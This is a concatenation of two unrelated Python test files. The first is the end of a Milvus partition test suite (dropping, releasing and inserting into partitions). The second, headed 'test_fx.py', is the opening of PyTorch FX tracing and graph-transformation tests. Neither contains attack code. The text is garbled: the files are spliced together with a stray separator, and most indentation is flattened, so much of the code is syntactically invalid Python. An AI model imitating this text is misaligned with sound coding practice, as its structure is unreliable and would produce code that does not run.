        method: 1. create a partition with default schema
                2. insert some data
                3. flush or not flush (flush step removed for issue #5837)
                4. drop the partition
        expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data())
        # # flush step removed for issue #5837
# if flush:
# self._connect().flush([collection_w.name])
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L2)
# @pytest.mark.parametrize("flush", [True, False])
@pytest.mark.parametrize("partition_name, data", [(cf.gen_unique_str(prefix), cf.gen_default_list_data(nb=3000))])
@pytest.mark.parametrize("index_param", cf.gen_simple_index())
def test_partition_drop_indexed_partition(self, partition_name, data, index_param):
"""
target: verify drop an indexed partition
        method: 1. create a partition
                2. insert some data
                3. create an index
                4. flush or not flush (flush step removed for issue #5837)
5. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
ins_res, _ = partition_w.insert(data)
assert len(ins_res.primary_keys) == len(data[0])
# create index of collection
collection_w.create_index(ct.default_float_vec_field_name, index_param)
# # flush
# if flush:
# self._connect().flush([collection_w.name])
# drop partition
partition_w.drop()
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_empty_partition(self):
"""
target: verify release an empty partition
        method: 1. create a partition
2. release the partition
expected: release successfully
"""
# create partition
partition_w = self.init_partition_wrap()
assert partition_w.is_empty
# release partition
partition_w.release()
# TODO: assert no more memory consumed
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release_dropped_partition(self):
"""
        target: verify release a dropped partition
        method: 1. create a partition
                2. drop the partition
                3. release the partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# release the dropped partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_release_dropped_collection(self, partition_name):
"""
        target: verify release a partition of a dropped collection
        method: 1. create a collection and partition
                2. drop the collection
                3. release the partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# release the partition and check err response
partition_w.release(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, search_vectors",
[(cf.gen_unique_str(prefix), cf.gen_vectors(1, ct.default_dim))])
def test_partition_release_after_collection_released(self, partition_name, search_vectors):
"""
target: verify release a partition after the collection released
        method: 1. create a collection and partition
                2. insert some data
                3. release the collection
                4. release the partition
expected: partition released successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# insert data to partition
data = cf.gen_default_list_data()
partition_w.insert(data)
assert partition_w.num_entities == len(data[0])
assert collection_w.num_entities == len(data[0])
# load partition
partition_w.load()
# search of partition
res_1, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res_1) == 1
# release collection
collection_w.release()
# search of partition
res_2, _ = partition_w.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 0,
ct.err_msg: "not loaded into memory"})
# release partition
partition_w.release()
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name, data", [(ct.default_partition_name, cf.gen_default_dataframe_data())])
def test_partition_insert_default_partition(self, partition_name, data):
"""
target: verify insert data into _default partition
        method: 1. create a collection
2. insert some data into _default partition
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# get the default partition
assert collection_w.has_partition(partition_name)[0]
partition_w = self.init_partition_wrap(collection_w, partition_name)
# insert data to partition
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == len(data)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_insert_dropped_partition(self):
"""
target: verify insert data into dropped partition
        method: 1. create a partition
                2. drop the partition
                3. insert data into the dropped partition
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
# drop partition
partition_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
# TODO: update the assert error
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", [cf.gen_unique_str(prefix)])
def test_partition_insert_dropped_collection(self, partition_name):
"""
target: verify insert data into dropped collection
        method: 1. create a collection and a partition
                2. drop the collection
                3. insert data into the partition
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w, partition_name)
assert collection_w.has_partition(partition_name)[0]
# drop collection
collection_w.drop()
# insert data to partition
partition_w.insert(cf.gen_default_dataframe_data(),
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "None Type"})
@pytest.mark.tags(CaseLabel.L2)
    def test_partition_insert_maximum_size_data(self):
"""
        target: verify insert maximum size data (256M?) at a time
        method: 1. create a partition
2. insert maximum size data
expected: insert successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_w = self.init_partition_wrap(collection_w)
# insert data to partition
max_size = 100000 # TODO: clarify the max size of data
ins_res, _ = partition_w.insert(cf.gen_default_dataframe_data(max_size))
assert len(ins_res.primary_keys) == max_size
# self._connect().flush([collection_w.name])
assert partition_w.num_entities == max_size
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dim", [ct.default_dim - 1, ct.default_dim + 1])
def test_partition_insert_mismatched_dimensions(self, dim):
"""
        target: verify insert data with mismatched dimensions
        method: 1. create a collection with default dim
                2. insert data with a mismatched dim
expected: raise exception
"""
# create partition
partition_w = self.init_partition_wrap()
data = cf.gen_default_list_data(nb=10, dim=dim)
# insert data to partition
partition_w.insert(data, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "but entities field dim"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("sync", [True, False])
def test_partition_insert_sync(self, sync):
"""
target: verify insert sync
        method: 1. create a partition
2. insert data in sync
expected: insert successfully
"""
pass
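        # Hedged sketch of a possible implementation; the `_async` insert
        # flag is an assumption based on pymilvus conventions, so it stays
        # commented out rather than asserted as this suite's API:
        # partition_w = self.init_partition_wrap()
        # ins_res, _ = partition_w.insert(cf.gen_default_list_data(10), _async=not sync)
        # if not sync:
        #     ins_res.result()  # block until the async mutation lands
        # assert partition_w.num_entities == 10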
|
test_fx.py | import builtins
import contextlib
import copy
import functools
import inspect
import math
import numbers
import operator
import os
import pickle
import sys
import torch
import traceback
import warnings
import unittest
from math import sqrt
from pathlib import Path
from torch.multiprocessing import Process
from torch.testing import FileCheck
from torch.testing._internal.common_methods_invocations import op_db
from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests
from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap
import torch._C._fx # type: ignore
from torch.fx.node import Target, Argument
from torch.fx.passes import shape_prop
from torch.fx.immutable_collections import immutable_dict, immutable_list
from torch.fx.experimental.rewriter import RewritingTracer
from torch.fx.operator_schemas import get_signature_for_torch_op
from copy import deepcopy
from torch.fx.proxy import TraceError
from fx.quantization import Quantizer
from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401
from fx.test_dce_pass import TestDCE # noqa: F401
from fx.test_fx_const_fold import TestConstFold # noqa: F401
from typing import Any, Callable, Dict, NamedTuple, List, Optional, Set, Tuple, Union
from torch.testing._internal.common_utils import run_tests, TEST_WITH_ROCM, IS_WINDOWS, IS_SANDCASTLE, IS_MACOS
from torch.testing._internal.jit_utils import JitTestCase
from fx.named_tup import MyNamedTup
try:
from torchvision.models import resnet18
HAS_TORCHVISION = True
except ImportError:
HAS_TORCHVISION = False
skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision")
class SimpleTest(torch.nn.Module):
def forward(self, x):
return torch.relu(x + 3.0)
def a_non_torch_leaf(a, b):
return a + b
# Test wrap() passing both a function name as well as a function
# directly
def a_lifted_leaf(a, b):
return a[0] + a[1] + b
wrap('a_lifted_leaf')
# Test wrapping twice doesn't break anything
wrap('a_lifted_leaf')
def a_lifted_leaf2(a, b):
return a[0] + a[1] + b
wrap(a_lifted_leaf2)
wrap('len')
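# Hedged note: wrapping a builtin such as len makes it traceable; a call like
# len(proxy) is then recorded as a call_function node rather than failing
# during symbolic tracing (exercised by test_torch_fx_len below).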
@wrap
def wrapped_via_decorator(a):
return a + 1
real_wrapped_via_decorator = wrapped_via_decorator
real_a_lifed_leaf = a_lifted_leaf
real_a_lifed_leaf2 = a_lifted_leaf2
_sqrt = sqrt
wrap('wrapper_fn')
def wrapper_fn(x):
return torch.foo(x)
class Pair(NamedTuple):
x : torch.Tensor
y : torch.Tensor
class TestFX(JitTestCase):
def setUp(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
return
torch_root = Path(__file__).resolve().parent.parent
p = torch_root / 'build' / 'lib' / 'libtorchbind_test.so'
torch.ops.load_library(str(p))
def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None):
"""Check that an nn.Module's results match the GraphModule version
for a given set of args/kwargs.
"""
kwargs = kwargs if kwargs else {}
ref_outs = m(*args, **kwargs)
gm = symbolic_trace(m)
gm.graph.lint()
test_outs = gm(*args, **kwargs)
self.assertEqual(ref_outs, test_outs)
def test_graph_module(self):
class MySub(torch.nn.Module):
def __init__(self):
super().__init__()
self.w = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.w + x
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(4, 3)
self.sub_mod = MySub()
self.w = torch.nn.Parameter(torch.rand(3))
def forward(self, A, B, c):
t = torch.sigmoid(A) + self.lin(c)
return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3))
m = MyModule()
gm = symbolic_trace(m)
ms = torch.jit.script(gm)
class M2(torch.nn.Module):
def forward(self, A):
m, idx = torch.max(A, 0)
return m + 1, idx + 1
m2 = M2()
gm2 = symbolic_trace(m2)
class T(torch.nn.Module):
def forward(self, A, b=4, *args, c=5, **kwargs):
x = A + 1 + args[0] + kwargs['3']
return x
t = T()
symbolic_trace(t)
def test_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(torch.sin(x + y), gm(x, y))
def test_args_kwargs(self):
class T(torch.nn.Module):
def forward(self, *args, **kwargs):
x = args[0] + kwargs['foo']
return x
t = T()
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_args_kwargs_no_self(self):
class T(torch.nn.Module):
def forward(*args, **kwargs): # noqa: B902
self = args[0]
return torch.relu(args[1])
t = T()
with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'):
self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)})
def test_fx_shifts(self):
class MyModule(torch.nn.Module):
def forward(self, x):
return x << 3, x >> 3
input = torch.LongTensor(10).random_(0, 1024)
m = MyModule()
self.checkGraphModule(m, (input,))
def test_dict(self):
class MyDictMod(torch.nn.Module):
def forward(self, d):
return d['3'].relu(), {'4' : d['3'].neg()}
input_dict = {'3': torch.rand(3, 4)}
m = MyDictMod()
self.checkGraphModule(m, (input_dict,))
def test_disallow_override(self):
# Custom delegate to disallow in-place tensor operations
class NoMutableCallTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
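                # Torch's in-place ops end with '_' by convention; derive a
                # readable name from the call target and reject such targets.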
name = target if isinstance(target, str) else torch.typename(target)
if name[-1] == '_':
raise RuntimeError('In-place operations are not supported')
return super().create_node(kind, target, args, kwargs, name)
# Test method
class MyInplaceMod(torch.nn.Module):
def forward(self, x):
x.add_(3.0)
return x
m = MyInplaceMod()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m)
# Test free function
class MyInplaceMod2(torch.nn.Module):
def forward(self, x):
torch.log_(x)
return x
m2 = MyInplaceMod2()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m2)
# Test symbolic node as an arg
class MyInplaceMod3(torch.nn.Module):
def forward(self, x):
y = torch.ones(3, 4)
y.add_(x)
return x
m3 = MyInplaceMod3()
with self.assertRaisesRegex(RuntimeError, 'In-place operations'):
NoMutableCallTracer().trace(m3)
def test_leaf_module(self):
# Custom delegate to make it so that there are no leaf modules, everything
# should get traced through
class NoLeafModulesTracer(Tracer):
def is_leaf_module(self, m, qualname):
return False
class MyReluMod(torch.nn.Module):
def __init__(self):
super().__init__()
self.relu = torch.nn.ReLU()
def forward(self, x):
return self.relu(x)
mrm = MyReluMod()
sym = NoLeafModulesTracer().trace(mrm)
for node in sym.nodes:
self.assertNotEqual(node.op, 'call_module')
sym.lint()
def test_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y)
m = symbolic_trace(to_trace)
self.assertIn('a_lifted_leaf2', m.code)
self.assertEqual(27, m(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_wrapped_via_decorator(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
m = symbolic_trace(to_trace)
self.assertIn('wrapped_via_decorator', m.code)
self.assertEqual(m(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_graph_edit_with_proxy(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
gm.graph.lint()
self.assertEqual(gm(3, 4), 14)
def test_graph_unique_names(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = symbolic_trace(m).graph
new_g = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_val = new_g.graph_copy(g, val_map)
t = Proxy(output_val)
# test that we can use proxy objects to generate more graph code later for things that do not need to work with modules.
new_g.output((t + t).node)
gm = GraphModule(m, new_g)
seen_names : Set[str] = set()
for node in gm.graph.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
def test_stack_traces(self):
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
tracer = torch.fx.Tracer()
tracer.record_stack_traces = True
graph = tracer.trace(M())
for node in graph.nodes:
if node.op == 'output':
continue
self.assertTrue(node.stack_trace is not None)
assert 'test_fx.py' in node.stack_trace
def test_graph_unique_names_manual(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1')
c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
graph2 = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
graph2.graph_copy(graph, val_map)
seen_names : Set[str] = set()
for node in graph2.nodes:
assert node.name not in seen_names
seen_names.add(node.name)
@skipIfNoTorchVision
def test_resnet(self):
resnet = resnet18()
resnet.train()
res_graph = symbolic_trace(resnet)
res_script = torch.jit.script(res_graph)
ip = torch.rand(1, 3, 224, 224)
a = resnet(ip)
b = res_graph(ip)
c = res_script(ip)
self.assertEqual(a, b)
self.assertEqual(a, c)
quantizer = Quantizer(res_graph)
for i in range(10):
quantizer.observe((torch.rand(1, 3, 224, 224),))
qgraph = quantizer.quantize()
qgraph.graph.lint()
qgraph_script = torch.jit.script(qgraph)
d = qgraph(ip)
e = qgraph_script(ip)
assert (a - d).abs().max() < 2
self.assertEqual(d, e)
def test_unpack(self):
class M(torch.nn.Module):
def forward(self, a, b):
c, d = a
return c + d + b
a = (torch.rand(1), torch.rand(1))
b = torch.rand(1)
m = M()
self.checkGraphModule(m, (a, b))
def test_native_callable(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
raise unittest.SkipTest("non-portable load_library call used in test")
# This test exercises the case where we use FX to translate from Python
# code to some native callable object
#
# For the purposes of testing, we use ElementwiseInterpreter defined
# in test_custom_class.cpp.
#
# We test that we can
# 1) Construct a native callable from FX IR
# 2) Construct a drop-in replacement module that delegates to the
# native callable rather than the original code
# 3) Run both the original code and native callable wrapper with
# equivalent results
# 4) TorchScript compile the native callable wrapper and confirm
# equivalent results with the reference
# 5) TorchScript serialize and deserialize the native callable
# and confirm equivalent results with the reference
# We use this simple Module as a reference computation
class MySimpleMod(torch.nn.Module):
def forward(self, x):
return 3.0 * x + x
msm = MySimpleMod()
# This is what a lowering pass might look like: a function that takes
# a valid nn.Module, symbolically traces it, lowers the Module to some
# representation, and wraps that representation up into another
# nn.Module instance that handles dispatch to the compiled/lowered code.
def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module:
# ===== Stage 1: Symbolic trace the module =====
mod = symbolic_trace(orig_mod)
# ===== Stage 2: Lower GraphModule representation to the C++
# interpreter's instruction format ======
instructions = []
constant_idx = 0
constants = {}
fn_input_names = []
target_to_name = {
operator.add : "add",
operator.mul : "mul"
}
output_node : Optional[Node] = None
# For each instruction, create a triple
# (instruction_name : str, inputs : List[str], output : str)
# to feed into the C++ interpreter
for n in mod.graph.nodes:
target, args, out_name = n.target, n.args, n.name
assert len(n.kwargs) == 0, "kwargs currently not supported"
if n.op == 'placeholder':
# Placeholders specify function argument names. Save these
# for later when we generate the wrapper GraphModule
fn_input_names.append(target)
elif n.op == 'call_function':
assert target in target_to_name, "Unsupported call target " + target
arg_names = []
for arg in args:
if not isinstance(arg, Node):
# Pull out constants. These constants will later be
# fed to the interpreter C++ object via add_constant()
arg_name = f'constant_{constant_idx}'
constants[arg_name] = torch.tensor(
[arg] if isinstance(arg, numbers.Number) else arg)
arg_names.append(arg_name)
constant_idx += 1
else:
arg_names.append(arg.name)
instructions.append((target_to_name[target], arg_names, out_name))
elif n.op == 'output':
if output_node is not None:
raise RuntimeError('Multiple output nodes!')
output_node = n
else:
raise RuntimeError('Unsupported opcode ' + n.op)
interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter()
# Load constants
for k, v in constants.items():
interpreter.add_constant(k, v)
# Specify names for positional input arguments
interpreter.set_input_names(fn_input_names)
# Load instructions
interpreter.set_instructions(instructions)
# Specify name for single output
assert isinstance(output_node.args[0], torch.fx.Node)
interpreter.set_output_name(output_node.args[0].name)
# ===== Stage 3: Create a wrapper GraphModule around the interpreter =====
class WrapperModule(torch.nn.Module):
def __init__(self, interpreter):
super().__init__()
self.interpreter = interpreter
wrapper = WrapperModule(interpreter)
# Create a graph that: 1) Takes function arguments 2) Invokes the interpreter
        # 3) Returns the specified return value
# FIXME: The following code could be greatly simplified by symbolic_trace'ing
# the wrapper with a Tracer that considers the Wrapper instance a root
# module, however, I can't get `__call__` exposed on TorchBind classes
# without it messing up Python `hasattr` for some reason. More digging
# into CPython's implementation of hasattr is probably in order...
graph = torch.fx.Graph()
# Add placeholders for fn inputs
placeholder_nodes = []
for name in fn_input_names:
placeholder_nodes.append(graph.create_node('placeholder', name))
# Get the interpreter object
interpreter_node = graph.create_node('get_attr', 'interpreter')
# Add a node to call the interpreter instance
output_node = graph.create_node(
op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes))
# Register output
graph.output(output_node)
graph.lint()
# Return final GraphModule!!!
return GraphModule(wrapper, graph)
# Lower GraphModule to C++ interpreter
lowered = lower_to_elementwise_interpreter(msm)
# Compare correctness with original module
x = torch.rand(3, 4)
ref_out = msm(x)
test_out = lowered(x)
torch.testing.assert_allclose(test_out, ref_out)
# Test TorchScript compilation
scripted_lowered = torch.jit.script(lowered)
script_out = scripted_lowered(x)
torch.testing.assert_allclose(script_out, ref_out)
# Test TorchScript ser/de
import_copy = self.getExportImportCopy(scripted_lowered)
imported_out = import_copy(x)
torch.testing.assert_allclose(imported_out, ref_out)
def test_reserved_getattr(self):
"""Ensure that we do not name any nodes with a reserved builtin like `getattr`"""
class M(torch.nn.Module):
def forward(self, a):
return a.foo.bar.baz
m = M()
m_g = symbolic_trace(m)
m_g.graph.lint()
for node in m_g.graph.nodes:
self.assertTrue(node.name != "getattr")
def test_node_tagging(self):
class TaggingTracer(Tracer):
def create_node(self, kind : str, target : Union[str, Callable],
args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None,
type_expr : Optional[Any] = None) -> Node:
n = super().create_node(kind, target, args, kwargs, name)
n.tag = 'foo'
return n
class M(torch.nn.Module):
def forward(self, a, b):
return a + b
m = M()
g = TaggingTracer().trace(m)
g.lint()
for n in g.nodes:
self.assertTrue(hasattr(n, 'tag'))
self.assertEqual(n.tag, 'foo')
def test_tensor_attribute(self):
class TensorAttribute(torch.nn.Module):
def __init__(self):
super().__init__()
self.tensor = torch.rand(3, 4)
def forward(self, x):
return torch.nn.functional.linear(x, self.tensor)
ta = TensorAttribute()
traced = symbolic_trace(ta)
traced(torch.rand(4, 4))
class WrapperForQualname(torch.nn.Module):
def __init__(self):
super().__init__()
self.ta = TensorAttribute()
def forward(self, x):
return torch.nn.functional.linear(x, self.ta.tensor)
wfq = WrapperForQualname()
traced2 = symbolic_trace(wfq)
traced2.graph.lint()
traced2(torch.rand(4, 4))
def test_symbolic_trace_sequential(self):
class Simple(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
seq = torch.nn.Sequential(
Simple(),
Simple(),
Simple()
)
traced = symbolic_trace(seq)
traced.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(traced(x), seq(x))
def test_tensor_constant(self):
class ConstTensor(torch.nn.Module):
def forward(self, x):
return torch.nn.functional.linear(x, torch.zeros(3, 4))
ct = ConstTensor()
traced = symbolic_trace(ct)
traced.graph.lint()
traced(torch.rand(4, 4))
def test_pickle_graphmodule(self):
class Nested(torch.nn.Module):
def __init__(self):
super().__init__()
self.st = torch.nn.Linear(4, 4)
def forward(self, x):
return self.st(x)
n = Nested()
traced = symbolic_trace(n)
traced.graph.lint()
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x = torch.rand(3, 4)
self.assertEqual(loaded(x), traced(x))
def test_pickle_custom_import(self):
graph = torch.fx.Graph()
a = graph.placeholder('x')
b = graph.placeholder('y')
c = graph.call_function(a_non_torch_leaf, (a, b))
d = graph.call_function(torch.sin, (c,))
graph.output(d)
gm = GraphModule(torch.nn.Module(), graph)
pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
loaded.graph.lint()
x, y = torch.rand(1), torch.rand(1)
self.assertEqual(loaded(x, y), gm(x, y))
def test_all_input_nodes(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.placeholder('x')
b : torch.fx.Node = graph.call_module('linear_mod', args=(a,))
c : torch.fx.Node = graph.get_attr('y_attr')
d : torch.fx.Node = graph.call_function(operator.add, args=(b, c))
e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0))
graph.output(e)
graph.lint()
self.assertEqual(b.all_input_nodes, [a])
self.assertEqual(c.all_input_nodes, [])
self.assertEqual(d.all_input_nodes, [b, c])
self.assertEqual(e.all_input_nodes, [d])
def test_deepcopy_graphmodule_with_transform(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
def transform(traced):
new_graph = torch.fx.Graph()
val_map : Dict[Node, Node] = {}
output_value = new_graph.graph_copy(traced.graph, val_map)
relu_out = new_graph.create_node(
op='call_method', target='neg', args=(output_value,), kwargs={})
new_graph.output(relu_out)
return GraphModule(traced, new_graph)
transformed = transform(traced)
transformed.graph.lint()
copied = copy.deepcopy(transformed)
self.assertNotEqual(id(type(transformed)), id(type(copied)))
x = torch.randn(3, 4)
self.assertEqual(copied(x), transformed(x))
def test_deepcopy_with_submods_params(self):
class Bar(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
def forward(self, x):
return torch.relu(x) + self.param
class Baz(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.bar = Bar()
def forward(self, x):
return self.bar(x) - self.param
baz = Baz()
traced = symbolic_trace(baz)
traced.graph.lint()
copied = copy.deepcopy(traced)
copied.graph.lint()
def test_unpack_list_better_error(self):
class SomeArgs(torch.nn.Module):
def forward(self, a, b):
return torch.rand(3, 4)
class UnpacksList(torch.nn.Module):
def __init__(self):
super().__init__()
self.sa = SomeArgs()
def forward(self, x : list):
return self.sa(*x)
ul = UnpacksList()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ul)
def test_unpack_dict_better_error(self):
class SomeKwargs(torch.nn.Module):
def forward(self, x=3, y=4):
return torch.rand(3, 4)
class UnpacksDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.sk = SomeKwargs()
def forward(self, x : dict):
return self.sk(**x)
ud = UnpacksDict()
with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'):
symbolic_trace(ud)
def test_pretty_print_targets(self):
# Test that Graph pretty-print prints friendly name for targets
# in `operator` and `builtins`
class SomeMod(torch.nn.Module):
def forward(self, x):
return torch.add(x.foo + x.bar, 3.0)
traced = symbolic_trace(SomeMod())
graph_str = str(traced.graph)
self.assertIn('builtins.getattr', graph_str)
self.assertIn('operator.add', graph_str)
self.assertIn('torch.add', graph_str)
def test_pretty_print_node(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.param: torch.nn.Parameter = torch.nn.Parameter(
torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x: torch.Tensor, y: int = 2):
return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0)
traced = symbolic_trace(M())
all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes])
FileCheck().check("x").check("placeholder") \
.check("y").check("placeholder") \
.check("getitem").check("call_function") \
.check("param").check("get_attr") \
.check("add").check("call_function") \
.check("linear").check("call_module") \
.check("clamp").check("call_method") \
.run(all_formatted)
def test_script_tensor_constant(self):
# TorchScript seems to ignore attributes that start with `__`.
# We used to call anonymous Tensor values `__tensor_constant*`, but
# they were getting ignored by script. Now they're called
# `_tensor_constant*`
class IHaveATensorConstant(torch.nn.Module):
def forward(self, x):
return x + torch.rand(3, 4)
traced = torch.fx.symbolic_trace(IHaveATensorConstant())
torch.jit.script(traced)
def test_torch_fx_len(self):
class FXLenTest(torch.nn.Module):
def forward(self, x):
return len(x)
traced = symbolic_trace(FXLenTest())
self.assertEqual(traced(torch.rand(3, 4)), 3)
# Test scriptability
scripted = torch.jit.script(FXLenTest())
self.assertEqual(scripted(torch.rand(3)), 3)
traced_scripted = torch.jit.script(traced)
self.assertEqual(traced_scripted(torch.rand(3)), 3)
# Test non-proxy len
class FXLenTest2(torch.nn.Module):
def __init__(self):
super().__init__()
self.l = [3, 4, 5]
def forward(self, x):
return x + len(self.l)
traced2 = symbolic_trace(FXLenTest2())
inp = torch.rand(3, 4)
self.assertEqual(traced2(inp), inp + 3.0)
self.assertIs(len, builtins.len)
def test_sqrt(self):
class Sqrt1(torch.nn.Module):
def forward(self, x):
return sqrt(x.size(0))
class Sqrt2(torch.nn.Module):
def forward(self, x):
return math.sqrt(x.size(0))
class Sqrt3(torch.nn.Module):
def forward(self, x):
return x + math.sqrt(2) + sqrt(2)
self.checkGraphModule(Sqrt1(), [torch.zeros(8)])
self.checkGraphModule(Sqrt2(), [torch.zeros(8)])
self.checkGraphModule(Sqrt3(), [torch.zeros(8)])
self.assertIs(sqrt, _sqrt)
self.assertIs(math.sqrt, _sqrt)
def test_torch_custom_ops(self):
class M(torch.nn.Module):
def forward(self, a):
b = torch.ops.aten.sigmoid(a)
c = torch.ops.aten.cat([a, b])
return torch.ops.aten.cat((c, c))
m = M()
input = torch.randn(3)
ref_out = m(input)
gm = symbolic_trace(m)
gm.graph.lint()
out = gm(input)
self.assertEqual(out, ref_out)
